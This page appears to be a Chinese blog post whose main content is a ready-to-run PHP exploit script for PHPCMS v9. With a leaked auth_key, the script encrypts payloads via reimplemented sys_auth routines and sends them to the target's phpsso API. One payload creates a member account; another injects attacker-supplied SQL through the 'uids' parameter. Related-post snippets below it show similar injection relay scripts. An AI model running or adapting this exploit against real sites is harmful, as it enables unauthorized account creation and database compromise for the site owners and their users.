php sys auth,phpcms_v9 authkey注入

最新推荐文章于 2021-04-02 00:41:08 发布
最新推荐文章于 2021-04-02 00:41:08 发布
阅读量219 收藏
点赞数
文章标签: php sys auth

[PHP] 纯文本查看 复制代码<?php

#error_reporting(0);

$url = $_GET['url'];

$key = $_GET['key'];

//$host = 'http://网站/';

//$auth_key = '爆的key';

//$string = "action=member_delete&uids=".$_GET['id']; //uids注入点

$host = "http://$url/";

$auth_key = "$key";

$string = "action=member_delete&uids=".$_GET['id']; //uids注入点

$strings = "action=member_add&uid=88888&random=333333&username=test123456&password=e445061346e44cc38d9f985836b9eac6&email=ffff@qq.com®ip=8.8.8.8";

$ecode = sys_auth($strings,'ENCODE',$auth_key);

$url = $host."/api.php?op=phpsso&code=".$ecode;

$resp = file_get_contents($url);

#echo $resp;

$ecode = sys_auth($string,'ENCODE',$auth_key);

$url = $host."/api.php?op=phpsso&code=".$ecode;

#echo $url;

$resp = file_get_contents($url);

echo $resp;

$ecode = sys_auth2($strings,'ENCODE',$auth_key);

$url = $host."/api.php?op=phpsso&code=".$ecode;

$resp = file_get_contents($url);

#echo $resp;

$ecode = sys_auth2($string,'ENCODE',$auth_key);

$url = $host."/api.php?op=phpsso&code=".$ecode;

$resp = file_get_contents($url);

echo $resp;

$ecode = sys_auth3($strings,'ENCODE',$auth_key);

$url = $host."/api.php?op=phpsso&code=".$ecode;

$resp = file_get_contents($url);

#echo $resp;

$ecode = sys_auth3($string,'ENCODE',$auth_key);

$url = $host."/api.php?op=phpsso&code=".$ecode;

$resp = file_get_contents($url);

echo $resp;

function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {

$key_length = 4;

$key = md5($key != '' ? $key : pc_base::load_config('system', 'auth_key'));

$fixedkey = md5($key);

$egiskeys = md5(substr($fixedkey, 16, 16));

$runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';

$keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));

$string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string :

base64_decode(strtr(substr($string, $key_length), '-_', '+/'));

if($operation=='ENCODE'){

$string .= substr(md5(microtime(true)), -4);

}

if(function_exists('mcrypt_encrypt')==true){

$result=sys_auth_ex($string, $operation, $fixedkey);

}else{

$i = 0; $result = '';

$string_length = strlen($string);

for ($i = 0; $i < $string_length; $i++){

$result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));

}

}

if($operation=='DECODE'){

$result = substr($result, 0,-4);

}

if($operation == 'ENCODE') {

return $runtokey . rtrim(strtr(base64_encode($result), '+/', '-_'), '=');

} else {

if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result,

26).$egiskeys), 0, 16)) {

return substr($result, 26);

} else {

return '';

}

}

}

function sys_auth_ex($string,$operation = 'ENCODE',$key)

{

$encrypted_data="";

$td = mcrypt_module_open('rijndael-256', '', 'ecb', '');

$iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);

$key = substr($key, 0, mcrypt_enc_get_key_size($td));

mcrypt_generic_init($td, $key, $iv);

if($operation=='ENCODE'){

$encrypted_data = mcrypt_generic($td, $string);

}else{

$encrypted_data = rtrim(mdecrypt_generic($td, $string));

}

mcrypt_generic_deinit($td);

mcrypt_module_close($td);

return $encrypted_data;

}

function sys_auth2($string, $operation = 'ENCODE', $key = '', $expiry = 0) {

$ckey_length = 4;

$key = md5($key != '' ? $key : $this->ps_auth_key);

$keya = md5(substr($key, 0, 16));

$keyb = md5(substr($key, 16, 16));

$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

$cryptkey = $keya.md5($keya.$keyc);

$key_length = strlen($cryptkey);

$string = $operation == 'DECODE' ? base64_decode(strtr(substr($string, $ckey_length), '-_', '+/')) : sprintf('%010d', $expiry ? $expiry +

time() : 0).substr(md5($string.$keyb), 0, 16).$string;

$string_length = strlen($string);

$result = '';

$box = range(0, 255);

$rndkey = array();

for($i = 0; $i <= 255; $i++) {

$rndkey[$i] = ord($cryptkey[$i % $key_length]);

}

for($j = $i = 0; $i < 256; $i++) {

$j = ($j + $box[$i] + $rndkey[$i]) % 256;

$tmp = $box[$i];

$box[$i] = $box[$j];

$box[$j] = $tmp;

}

for($a = $j = $i = 0; $i < $string_length; $i++) {

$a = ($a + 1) % 256;

$j = ($j + $box[$a]) % 256;

$tmp = $box[$a];

$box[$a] = $box[$j];

$box[$j] = $tmp;

$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));

}

if($operation == 'DECODE') {

if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result,

26).$keyb), 0, 16)) {

return substr($result, 26);

} else {

return '';

}

} else {

return $keyc.rtrim(strtr(base64_encode($result), '+/', '-_'), '=');

}

}

function sys_auth3($string, $operation = 'ENCODE', $key = '', $expiry = 0) {

$key_length = 4;

$key = md5($key);

$fixedkey = md5($key);

$egiskeys = md5(substr($fixedkey, 16, 16));

$runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';

$keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));

$string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string :

base64_decode(substr($string, $key_length));

//10位密文过期信息+16位明文和密钥生成的密文验证信息+明文

$i = 0; $result = '';

$string_length = strlen($string);

for ($i = 0; $i < $string_length; $i++){

$result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));

}

if($operation == 'ENCODE') {

return $runtokey . str_replace('=', '', base64_encode($result));

} else {

if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result,

26).$egiskeys), 0, 16)) {

return substr($result, 26);

} else {

return '';

}

}

}

?>

任晶玉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpcms authkey 系列
温和的跳跃
12-03 357
不是很明白,对于加密解密一直不明白,还有漫长的业务逻辑。但是还是想明白一下下。
phpcms authkey注入中转脚本
weixin_33814685的博客
04-03 181
<?php set_time_limit(0); $wang_url='http://www.0day5.com'; $auth_key='xxxxxxxxxxxxxxxxxxxxxxxxxxxx'; $str="uid=1".stripslashes($_GET['id']); $encode=sys_auth($str,'ENCODE',...
php获得auth_key漏洞,phpcms v9漏洞:authkey中转注入漏洞
weixin_39927993的博客
04-02 416
set_time_limit(0);$wang_url = 'http://www.adminwl.com';$auth_key = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx';$str = "uid=1".stripslashes($_GET['id']);$encode = sys_auth($str, 'ENCODE', $auth_key);$content = file...
php中转注入,phpcms authkey注入中转脚本
weixin_28701593的博客
03-16 139
set_time_limit(0);$wang_url='http://www.0day5.com';$auth_key='xxxxxxxxxxxxxxxxxxxxxxxxxxxx';$str="uid=1".stripslashes($_GET['id']);$encode=sys_auth($str,'ENCODE',$auth_key);$content=file_g...
php获得auth_key漏洞,phpcmsv9 authkey泄露导致SQL注入漏洞 | CN-SEC 中文网
weixin_39853892的博客
04-02 376
好久没有关注phpcms了,最近老是有朋友问我关于phpcms的问题,网上找了一下,目前问题比较严重的就是这个authkey泄露导致sql注入拿shell的了,先转些介绍文章吧,exp稍候写出来了再发,请及时关注本人博客。。。首先请看乌云上面的大牛分析的文章:http://www.2cto.com/phpsso_server/index.php?m=phpsso&c=index&a...
php auth_http类库进行身份效验
10-30
`auth_http` 类库是PHP中一个用于实现HTTP基本认证(Basic Authentication)和digest认证(Digest Authentication)的工具,它依赖于`auth` 类库。在本文中,我们将深入探讨如何使用`auth_http` 类库进行身份验证,...
php使用Header函数,PHP_AUTH_PW和PHP_AUTH_USER做用户验证
10-22
主要介绍了php使用Header函数,PHP_AUTH_PW和PHP_AUTH_USER做用户验证的方法,结合实例形式分析了PHP使用Header函数调用登录验证及PHP_AUTH_PW和PHP_AUTH_USER进行验证处理的相关技巧,需要的朋友可以参考下
解决更改AUTH_USER_MODEL后出现的问题
09-16
在Django框架中,`AUTH_USER_MODEL`是一个重要的设置,用于指定自定义用户模型。默认情况下,Django使用`auth.User`模型来处理用户身份验证和授权,但有时我们需要根据项目需求扩展用户模型,比如添加更多的字段或...
php sys auth,PHPCMSV9 AuthKey泄露导致注入EXP
weixin_42512096的博客
03-13 536
天小站发布了PHPCMSV9 AuthKey泄露导致SQL注入的文章,熟悉本站的兄弟们都知道,今天可能就会发布EXP了,恭喜你,又猜对了。好久没有写PHP版的EXP了,这次再写就已经基本忘光了,唉,花了好久的时间呀,最终还是完成了。其实使用昨天的那个中转脚本已经完全够用了,今天发布的这个是给懒人用的,先给个图吧。。。...
phpcms v9 sys_auth函数加密原理
程序改变世界
07-20 1707
phpcms v9 sys_auth函数加密原理 假设变量$a,$b,$c=$a^$b(变量a异或变量b), 所以我们有$a=$b^$c , $b=$a^$c 以上是异或逻辑的应用,(题外话:如何在不使用第3个变量的情况下,交换变量$a,$b的值呢?)
PHPCMSV9 AuthKey泄露导致注入EXP
weixin_34329187的博客
04-03 545
天小站发布了PHPCMSV9 AuthKey泄露导致SQL注入的文章,熟悉本站的兄弟们都知道,今天可能就会发布EXP了,恭喜你,又猜对了。好久没有写PHP版的EXP了,这次再写就已经基本忘光了,唉,花了好久的时间呀,最终还是完成了。其实使用昨天的那个中转脚本已经完全够用了,今天发布的这个是给懒人用的,先给个图吧。。。<?php /** *Createdby独自等...
php获得auth_key漏洞,PHPCMS authkey泄露导致注入
weixin_34644072的博客
04-02 977
发布时间:2017-04-28公开时间:N/A漏洞类型:sql注入危害等级:高漏洞编号:xianzhi-2017-04-93356191测试版本:N/A漏洞详情install/install.php 184行if($module == 'admin') {$cookiepre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUV...
使用PHP创建Auth令牌
烂笔头
05-13 713
使用OAuth和类似的认证协议需要使用代表多个Web服务之间独特握手的临时令牌。这些令牌必须是唯一的,安全存储的,时间越长越好。 如何创建这样的标记而无需额外的库。下面的代码片段可以解决这个问题: //bin2hex(random_bytes($length)) $token=bin2hex(random_bytes(64)); /* 例子: 39e9289a5b8328ecc...
phpcms authkey生成算法问题导致authkey泄露
草巾冒小子的博客
06-12 6453
关于phpcms authkey生成算法问题导致authkey泄露的修复问题 简介: 漏洞名称:phpcms authkey生成算法问题导致authkey泄露 补丁文件:caches/configs/system.php 补丁来源:云盾自研 漏洞描述:phpcms在安装时,由于在同一个页面中连续使用mt_rand(),未进行有效mt_srand();种子随机化操...
PHPCMS V9版的会员登陆验证方法
beckzhanglang的专栏
06-26 1009
PHPCMS V9版的会员登陆验证方法, 从程序里提取出来的。 $phpcms_auth = param::get_cookie('auth'); if($phpcms_auth) {  $auth_key = md5(pc_base::load_config('system', 'auth_key').$_SERVER['HTTP_USER_AGENT']);  list($user
phpcms v9 如何实现用户登录
weixin_33943347的博客
07-13 317
因为有时候我们需要自己实现用户登录,比如我们用phpcms做一个微信Oauth2.0授权,授权之后直接登录,这过程中不需要用户输入账户和密码。所以我们就要搞清楚,phpcmsv9它是怎么实现用户登录的。换名话说,phpcmsphp代码在什么情况下会认定这个用户已经登录了。首先,我们肯定要去看phpcms它原生的登录程序是怎么写的,然后我们要去看它是怎么判断这个用户已经登录了。登录程序是怎么写的?...
phpcmsv9 authkey泄露导致SQL注入漏洞
weixin_30301183的博客
03-05 926
phpcmsv9 authkey泄露导致SQL注入漏洞 http://www.2cto.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJX...
phpcms获取auth_key漏洞
收集盒 Book box
08-21 2762
1.  为所欲为漏洞: 注册登录后访问 http://localhost:8038/study/phpcms/index.php?m=member&c=index&a=account_manage_avatar&t=1 查看源文件:     拿到这个:        aHR0cDovL2xvY2FsaG9zdDo4MDM4L3N0d
4种加密解密方式(php
qq_41755278的博客
09-10 902
6种加密解密方式(php) 第一种:openssl_encrypt($data, $method, $password, $options, $iv) $data 加密明文。 $method 加密方法(DES-ECB,DES-CBC,DES-CTR,DES-OFB,DES-CFB),密码学方式可用openssl_get_cipher_methods() 获取有效密码方式列表。 $passwd 加密密钥[密码]。 $options 数据格式选项(可选),格式有:OPENSSL_RAW_DATA(1) 、
@Entity(name = "t_sys_auth_flow") @Table(appliesTo = "t_sys_auth_flow", comment = "审核流程配置表") @Data public class TSysAuthFlow { @Id @GeneratedValue private Long id; private int approveStatus; private int operationType; } @Transactional @Query(nativeQuery=true, value="SELECT u1.* FROM t_sys_auth_flow u1 where u1.approve_status = ?1") TSysAuthFlow findAllByApproveStatus(int approveStatus);
最新发布
07-11
最后,你使用了`@Transactional`注解表明该方法需要在事务中运行,并使用了`@Query`注解来定义一个原生SQL查询,查询`t_sys_auth_flow`表中`approve_status`字段等于指定值的记录,并返回一个`TSysAuthFlow`对象。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值